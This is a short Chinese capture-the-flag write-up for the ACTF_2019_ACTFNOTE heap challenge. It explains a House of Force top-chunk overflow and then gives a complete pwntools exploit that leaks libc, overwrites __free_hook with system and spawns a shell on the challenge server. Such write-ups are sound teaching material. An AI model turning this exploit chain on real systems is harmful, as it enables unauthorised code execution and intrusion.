首先,检查一下程序的保护机制
然后,我们用IDA分析一下,edit里存在溢出,可以直接修改top chunk的size
那么只需要把top chunk的size修改为-1,然后malloc(负数)即可将TOP chunk向前移动与已有的chunk重叠,然后通过申请空间,控制该程序结构体的指针即可实现任意地址读写。
#coding:utf8 from pwn import * #sh = process('./ACTF_2019_ACTFNOTE') sh = remote('node3.buuoj.cn',29877) libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so') def add(size,name,content): sh.sendlineafter('$','1') sh.sendlineafter('size:',str(size)) sh.sendafter('name:',name) sh.sendafter('content:',content) def edit(index,content): sh.sendlineafter('$','2') sh.sendlineafter('id:',str(index)) sh.sendafter('content:',content) def delete(index): sh.sendlineafter('$','3') sh.sendlineafter('id:',str(index)) def show(index): sh.sendlineafter('$','4') sh.sendlineafter('id:',str(index)) add(0x10,'a\n','b'*0x18) #0 add(0x10,'a\n','/bin/sh\x00') #1 show(0) sh.recvuntil('b'*0x18) libc_base = u64(sh.recv(6).ljust(8,'\x00')) - 0x8e3f2 system_addr = libc_base + libc.sym['system'] free_hook_addr = libc_base + libc.sym['__free_hook'] binsh_addr = libc_base + libc.search('/bin/sh').next() print 'libc_base=',hex(libc_base) print 'system_addr=',hex(system_addr) add(0x10,'a\n','b\n') #2 edit(2,'b'*0x10 + p64(0) + '\xff'*0x8) #修改top chunk #top chunk上移形成overlap chunk add(-0x80,p64(free_hook_addr),'') #3 #修改free_hook edit(2,p64(system_addr)) #getshell delete(1) sh.interactive()
